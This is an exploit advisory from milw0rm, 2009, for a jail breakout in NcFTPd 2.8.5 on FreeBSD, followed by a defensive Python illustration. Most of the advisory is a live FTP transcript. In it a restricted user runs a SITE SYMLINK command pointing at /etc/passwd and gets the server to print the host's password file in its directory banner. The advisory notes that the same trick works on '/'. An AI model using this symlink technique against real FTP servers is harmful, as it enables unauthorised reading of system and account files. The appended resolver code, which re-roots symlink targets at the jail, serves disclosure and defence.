
"NcFTPd 2.8.5 - Remote Jail Breakout"

Author: kingcope
Platform: freebsd
Release date: 2009-07-27

NcFTPd <= 2.8.5 remote jail breakout

Discovered by:
	Kingcope
	Contact: kcope2<at>googlemail.com / http://isowarez.de

Date:
	27th July 2009

Greetings:
	Alex,Andi,Adize,wY!,Netspy,Revoguard

Prerequisites:
	Valid user account.
	
Demonstration on FreeBSD 7.0-RELEASE and NcFTPd 2.8.5 (latest version):

# ftp 192.168.2.5
Connected to 192.168.2.5.
220 localhost NcFTPd Server (unregistered copy) ready.
Name (192.168.2.5:root): kcope
331 User kcope okay, need password.
Password:
230-You are user #1 of 50 simultaneous users allowed.
230-
230 Restricted user logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get /etc/passwd passwd
local: passwd remote: /etc/passwd
502 Unimplemented command.
227 Entering Passive Mode (192,168,2,5,219,171)
550 No such file.
ftp> ls ..
227 Entering Passive Mode (192,168,2,5,218,102)
553 Permission denied.
ftp> mkdir isowarez
257 "/isowarez" directory created.
ftp> quote site symlink /etc/passwd isowarez/.message
250 Symlinked.
ftp> cd isowarez
250-"/isowarez" is new cwd.
250-
250-# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
250-#
250-root:*:0:0:Charlie &:/root:/bin/sh
250-toor:*:0:0:Bourne-again Superuser:/root:
250-daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
250-operator:*:2:5:System &:/:/usr/sbin/nologin
250-bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
250-tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
250-kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
250-games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
250-news:*:8:8:News Subsystem:/:/usr/sbin/nologin
250-man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
250-sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
250-smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
250-mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
250-bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
250-proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
250-_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
250-_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
250-uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
250-pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
250-www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
250-nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
250-kcope:*:1001:1001:User kcope:/home/kcope:/bin/csh
250-messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/sbin/nologin
250-polkit:*:562:562:PolicyKit Daemon User:/nonexistent:/sbin/nologin
250-haldaemon:*:560:560:HAL Daemon User:/nonexistent:/sbin/nologin
250-ftp:*:1002:14:User &:/home/ftp:/bin/sh
250-cyrus:*:60:60:the cyrus mail server:/usr/local/cyrus:/bin/csh
250-postfix:*:125:125:Postfix Mail System:/var/spool/postfix:/usr/sbin/nologin
250-test:*:1003:1003:test:/home/test:/bin/sh
250-+testx:*:::::/bin/sh
250
ftp>

+ On FreeBSD the same SITE SYMLINK trick also works against directories, e.g. '/'.

Cheerio,

Kingcope

# milw0rm.com [2009-07-27]
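The transcript shows the server following the link's absolute target /etc/passwd on the host filesystem when it displays isowarez/.message, instead of treating '/' as the jail root. The script below is an added illustration (not part of the advisory or of NcFTPd): it rebuilds that layout in a throwaway directory (constructed data) and contrasts host-style resolution with a chroot-style resolver that re-roots absolute symlink targets at the jail and clamps '..', which is the check a restricted-user mode needs whenever the server process itself is not chrooted.

```python
import os
import tempfile

def jail_resolve(jail_root, path, max_links=40):
    """Resolve a client-supplied path the way chroot(2) would: '/' is the jail
    root, '..' never climbs above it, and an absolute symlink target is
    re-rooted at the jail rather than followed on the host filesystem."""
    jail_root = os.path.realpath(jail_root)
    todo = [p for p in path.split("/") if p and p != "."]
    done = []          # resolved components below the jail root
    hops = 0
    while todo:
        comp = todo.pop(0)
        if comp == "..":
            if done:
                done.pop()   # '..' at the jail root stays at the jail root
            continue
        candidate = os.path.join(jail_root, *done, comp)
        if os.path.islink(candidate):
            hops += 1
            if hops > max_links:
                raise OSError("too many levels of symbolic links")
            target = os.readlink(candidate)
            if target.startswith("/"):
                done = []    # absolute target: rooted at the jail, not the host
            todo = [p for p in target.split("/") if p and p != "."] + todo
            continue
        done.append(comp)
    return os.path.join(jail_root, *done)

def host_resolve(jail_root, path):
    """What a non-chrooted server does: the link's absolute target is
    followed on the host, so the result can leave the jail."""
    return os.path.realpath(os.path.join(jail_root, path.lstrip("/")))

def escapes(jail_root, host_path):
    """True if host_path lies outside jail_root."""
    jail_root = os.path.realpath(jail_root)
    return os.path.commonpath([jail_root, host_path]) != jail_root

def demo():
    """Constructed layout from the advisory: isowarez/.message -> /etc/passwd."""
    with tempfile.TemporaryDirectory() as tmp:
        jail = os.path.realpath(tmp)
        os.mkdir(os.path.join(jail, "isowarez"))
        os.symlink("/etc/passwd", os.path.join(jail, "isowarez", ".message"))
        host = host_resolve(jail, "/isowarez/.message")
        jailed = jail_resolve(jail, "/isowarez/.message")
        return {"jail": jail, "host": host, "jailed": jailed,
                "host_escapes": escapes(jail, host),
                "jailed_escapes": escapes(jail, jailed)}
```

Running `demo()` shows the host-style result pointing at the real /etc/passwd while the jail-aware result stays under the temporary jail.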